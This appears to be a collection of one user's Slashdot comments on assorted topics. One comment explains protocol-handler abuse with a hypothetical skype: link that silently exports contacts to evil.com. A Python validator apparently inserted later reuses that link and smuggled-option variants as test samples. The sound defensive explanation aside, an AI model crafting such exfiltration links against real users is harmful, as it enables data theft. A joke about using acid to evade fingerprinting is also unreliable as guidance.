And also how the hell does it know how much to delay?
Okay, so it might be able to work out cable length based on resistance or something and delay based on that, but cable length doesn't equate to distance from listener so it'd be a useless measure and would actually crap things up in some situations.
Well this is the newer version, so I'm sure the interface has been improved and brought up to date. It may even perform better and look better without requiring all of the hardware updates of the new Vis[t]a credit cards.
As for third party money clips, they are available but some of them are still in beta and were forked because someone decided it should fit twenty notes instead of fifteen.
Rest assured that even if you do have problems after the change then there'll be a kind and helpful community that will work with you to help you resolve your problem, instead of having some generic helpdesk, an extortionate phone number or a complete lack of support.
I really do not use credit cards, but if I did this one wouldn't be a bad choice.
I only use them for online purchases as an additional layer of protection. One of the main purchases is hosting. I could buy my Linux hosting on a Linux card :)
As for the GP, I like how their non-religious people get black hoods and robes and basically turn into cultists :D It's interesting to note how religious trolls relate a lack of religion to a lack of morals. Just because morals are defined by religions doesn't mean that a lack of religion has a lack of morals. It just means it has morals decided by society instead of by some supposed supreme being.
Okay, so it's only EA and so not necessarily the best games, but now that a big dev house is starting to consider Mac OS X as a gaming platform, will they consider Linux as well? Given that they've got a similar *nix base then it shouldn't be too far a leap.
And yes, I know there's Wine and Cedega (which ran worse on my machine than Wine with Dawn of War) but something officially supported would be good. Even if it's just on a few main distros.
*reads Wikipedia* Turns out someone lied to me and it's 273.15 for Kelvins (or else someone improved it at some point). That still leaves Kelvins as SI and Rankines apparently predominantly US only.
But "Global Climate Change" doesn't pack such a punch on headlines. Something like "Global Climate Chaos" or "Global Climate Uncertainty" would have a good PR image, as would "Global Climate Flooding" (especially for those people like me in Three Counties who have recently been flooded out).
"Global Climate Change" has about as much punch to most people as "Global Climate Variation" or "Slight Disturbance in Global Weather".
Who needs real science when you've got a punchy name that evokes emotions and provides a lasting impression? ;)
Hydrochloric acid? It'd certainly make sure that there was no residue on your hands and that they couldn't trace fingerprints (if they weren't already on record) ;)
Anti-bacterial on everything in the house definitely seems to be a bad thing.
I had a friend at primary and secondary school, and his mum used to frequently wipe everything down with Dettol (don't know if it's a US brand as well). My mum wiped the surfaces down with a dish cloth, and occasionally used bleach or something when there was a particularly bad patch. He was ill way more than I ever was.
Okay, so it isn't conclusive, but given that they give inoculations for things then it can't be all that bad to actually expose yourself to some germs and bacteria and not just kill all of them, thereby leaving yourself more immune when you find a larger pocket.
It doesn't seem to need to be remotely installable. Reading the article (!) mentions that there's a developer's piece of software that's apparently vulnerable to sending out data via this method. That means it can be any badly designed software like AIM or Skype or anything else that could potentially legitimately register itself as a protocol handler that could be the target of this.
Granted, that means that exploits using it wouldn't work on people without that specific app installed or with the protocol handling removed, but then isn't it the same with spam and current exploits? Sending the spam/virus to everyone or probing as many computers as possible doesn't rely on it working for everyone, just on it working for some people and that those "some people" are sufficiently numerous.
IMO, only when it leads to unexpected behaviour. In this situation it might be expected behaviour, but behaviour that shouldn't sensibly have been made public. That makes it a security issue and a bad design decision, but not necessarily a bug (under my interpretation of 'bug' in software)
I was talking to a work-mate after posting that and he said a similar thing - it depends what you class as a bug, it could be a security bug.
IMO it wouldn't be a bug. To me a bug is something that shouldn't be happening, full stop. e.g. ability to inject data (as you can with a bad PHP script, register global variables and a specially constructed query string), ability to corrupt data or cause crashes (as you can do with a buffer overflow) or ability to bypass a security measure through some simple means (like my college's web filtering software that let you get to blockedexample.com by going to something like http://example.com/).
This, on the other hand, is just lax security or bad separation in design. It might be functionality that you want on the whole and hence a feature (as in my example) but to me registering the whole EXE is a bad choice, not checking the input when invoked in that way (if it's possible) is a bad choice, allowing the data sending without confirmations was potentially a bad choice, and so on.
Having said all that then I would still expect it to turn up in a bug tracking app ;) But phpBB have a separate "security bug tracker".
Only it's not that the application may have a bug, but that it may have an intentional feature that is useful for users that can then be exploited through a link. It might have less security than it should, but that's poor planning and not a bug.
Take someone's earlier example of Skype. Let's assume you can do "skype --export-contacts --dest /some/path/here". Nice and useful for when you're migrating settings on your own desktop. Now assume that Skype also lets you export to your website so that you can publish it to your site, so you can put a HTTP in there. Now assume that users have complained about popups prompting them and that they want a batch mode that lets them export each night to make sure they never lose data - so it doesn't prompt.
You'd now have something like "skype --export-contacts --dest http://www.example.com/mybackupscript --batch-mode". It does exactly what you want, you can archive your contacts, and you can even do it overnight to a remote location so it's accessible to you from anywhere and won't be lost in a disk crash. Only someone didn't secure it very well (again, bad implementation, not a bug) and someone somehow gets you to click on a link saying "skype:export-contacts&dest=http://www.evil.com/mybackupscript&batch-mode". That 'feature' is now being exploited to export your contacts to an arbitrary site without you even necessarily knowing.
I'm sure there are lots of other similar alternatives, but the whole point is that it's badly validated input and not a bug. It's fairly sensible to have "skype:call-userid" as a link so that you can run up Skype and call someone. What it's not sensible to do is let that URI call do anything that can be done locally.
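The design point made in the comment above, as an added example that is not part of the original post: a protocol-handler entry point that maps a clicked link onto a fixed allow-list of actions instead of forwarding its contents as command-line options. The `skype:` actions are the comment's hypothetical ones; the function names, the user-ID pattern and the sample URIs are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Hypothetical policy: the only action a link may trigger, with the
# validator for its single argument. Export, batch mode and every other
# local-only feature are deliberately absent from this table.
USER_ID = re.compile(r"[A-Za-z][A-Za-z0-9._-]{2,31}")
LINK_ACTIONS = {"call": USER_ID}


class RejectedURI(ValueError):
    """Raised when a link asks for something outside the allow-list."""


def parse_handler_uri(uri, scheme="skype"):
    """Return (action, argument) for an allowed link, else raise RejectedURI.

    The URI is treated as data: it is never split into CLI options and
    never handed to a shell.
    """
    found_scheme, sep, body = uri.partition(":")
    if not sep or found_scheme.lower() != scheme:
        raise RejectedURI("wrong scheme")
    # Decode once before validating, so "%2D%2D" cannot smuggle "--" past
    # the check. Any "%" left over afterwards fails the validator below.
    body = unquote(body)
    action, _, argument = body.partition("-")
    validator = LINK_ACTIONS.get(action)
    if validator is None:
        raise RejectedURI("action not permitted from a link")
    if not validator.fullmatch(argument):
        raise RejectedURI("invalid argument")
    return action, argument


def dispatch(uri):
    """Decide what a clicked link may do and return the decision as a dict."""
    try:
        action, argument = parse_handler_uri(uri)
    except RejectedURI as exc:
        return {"allowed": False, "reason": str(exc)}
    # Links never get a silent "batch mode": the user confirms every action.
    return {"allowed": True, "action": action, "argument": argument,
            "confirm": True}


# Constructed sample links: the two from the comment plus two variants.
SAMPLES = [
    "skype:call-userid",
    "skype:export-contacts&dest=http://www.evil.com/mybackupscript&batch-mode",
    "skype:call-%2D%2Dbatch-mode",
    "skype:call-userid&batch-mode",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", dispatch(sample))
```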
Just a related thing I thought of as I posted: Government and Government Associates hate companies who insist on "Private and Confidential" in documents and are unwilling to change to "Private and in confidence". One of the many joys of having Confidential as an important security keyword and having email monitors that check for sensitive keywords to stop accidental release!
Maybe the UK works differently (or maybe it's because of transfer of classification based on content) but I work at a List X company and people within the company get to determine whether documents are Restricted or whatever (we use UC, R, S and TS in the UK - there is Confidential, but it's generally replaced with S). They can also extract parts of a report and release them at a lower classification (since I spend most of my day working on an Unclass machine).
I'm assuming there must be some controls somewhere to stop incorrect downgrading etc, and it probably won't apply to business data (which gets marked "[company name] proprietary") but that's how it seems to work from my year here so far.
Pah, they're not company towns. Port Sunlight in the UK was a company town (built by Lord Leverhulme for the workers at the Lever Brothers soap factory). Being 1880s, I think it beats most American attempts at company towns (although I've never seen the shops in it, but then I've mainly been to the Lady Lever Art Gallery) :)
The only problem with mills (especially cotton mills) was that while it beat "maybe starving to death" it did add "possibly getting trapped and either killed or losing a limb". Especially if you were one of the young children who were young enough to get between the machines (while they were still running) and clear up the bits of cotton that could otherwise clog the machine.
If anyone lives in the UK then Quarry Bank Mill is a good place to go - they even still run one of the machines at times so you get the starts of an impression of how deaf they must have ended up by the end of the day!
Yes, but GUIs also normally have applications to enable and disable services (which was my point). Their method is to hack in files from the command line or similar, while most distros should have an "easy to use" service management app. I know Redhat and Fedora have for ages.
How To in summary... on Hardening Linux · Score: 5, Informative
For those not wanting to read the article, that "basic how to" is:
1) Disable unwanted services (done via the CLI in this day of GUIs)
2) Keep the OS patched
3) Install and run Bastille to do everything else for you.
I don't know, for a development company then I wouldn't be too happy if the only good points people could find were non-development related. It just seems like he's complimenting their marketing while also slyly (and presumably intentionally) not applauding their development. It's one of those "not what he says, but what he doesn't say" things.
As for being user friendly, yes, they have managed that. IMO they've also done well with C# and .Net, especially since it was opened up and Mono and many other related implementations and languages now use the framework.
Whether or not it's for the best that the "computer-challenged sods" can get online is another matter ;) Yes, I wouldn't have been computer savvy at one point, but having a certain level of desire and intent required at first would have stopped many things like botnets becoming such an issue :)
Sun Tzu was right though, you can either wean yourself off the enemy and create your own destiny, or you can destroy Darth Vader and take his place at the Emperor's side.
Wow, not only was Sun Tzu a master tactician (or at least the author of the tactical text of his era) but he was also a psychic who could see into at least the 1970s and predict the existence of someone called "Darth Vader" who was evil and had a place at the Emperor's side! That guy doesn't have enough respect.
"There are some things that Windows does pretty well," Zemlin said. Microsoft for instance has excelled in marketing the operating system, and has a good track record in fending off competition.
So what he's saying is that Linux excels at being good software, while Microsoft only excel at marketing practices? Sounds like a double-edged compliment to Microsoft to me!
That assumes that people want terms that match the facts, though, rather than terms that sound good and get the interest of the papers ;)
My new point is that you didn't read my follow up where I found I'd been lied to ;)
Half of the original point is that Rankines aren't 'normal' scientific units as they're not SI units.
With a base of -459.67 F = 0 R? At least Kelvins have a nice round number as a starting point (even if it is 273).
More importantly, Kelvins are SI but Rankines (which I'd never heard being used in the UK) are apparently not. It's all about standards ;)
Because 0.001 C instead of 0.0005 C (approx 0.001 F) makes a major difference to the correction ;)
TBH, I'd hope they'd be using Celsius as they map directly to Kelvins, but with the Americans and their Fahrenheit then you never know.
See http://it.slashdot.org/comments.pl?sid=271163&threshold=-1&commentsort=0&mode=thread&pid=20248365#20248719 for my longer response.